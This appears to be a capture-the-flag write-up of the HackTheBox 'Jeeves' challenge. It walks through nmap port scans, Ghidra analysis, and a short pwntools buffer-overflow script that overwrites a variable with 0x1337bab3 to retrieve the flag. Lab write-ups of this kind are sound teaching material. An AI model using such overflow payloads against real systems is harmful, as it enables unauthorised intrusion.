Jeeves-hackthebox:intro to binary exploitation
Given
host
165.227.225.205:31382
challenge description
How are you doing, sir?
some binary file
jeevs
I started by scanning the host
nmap -Pn --min-rate 4500 --max-rtt-timeout 1500ms 165.227.225.205 -p-
analysing jeevs file
file type
./jeeves: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=18c31354ce48c8d63267a9a807f1799988af27bf, for GNU/Linux 3.2.0, not stripped
strings gives nothing intresting
jeeves data flow
jeeves run --> asks for name --> hello $name exits
nmap output
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 16:58 EET
Nmap scan report for 165.227.225.205
Host is up (0.17s latency).
Not shown: 65499 filtered ports, 35 closed ports
PORT STATE SERVICE
31251/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 29.74 seconds
one port open
analysing port:
nmap -Pn -sC -sV 165.227.225.205 -p31251
output
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 17:00 EET
Nmap scan report for 165.227.225.205
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
31251/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Employee File Manager
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.50 seconds
Looking into jeeves page on port 31251
seems same binary is deployed there
lets try connectingto it with nc
further analysing binary with ghidra
we realise we need 60 x a to reach the var we want
so I used pwn tools witn nc
from pwn import *
target = process("nc")
target.sendline("209.97.187.130 32259")
payload = "A"*60
payload += p64(0x1337bab3)
target.sendline(payload)
print (target.recvuntil("}"))
and we get the flag
flag
HTB{hidden}
#easy #binary
Comments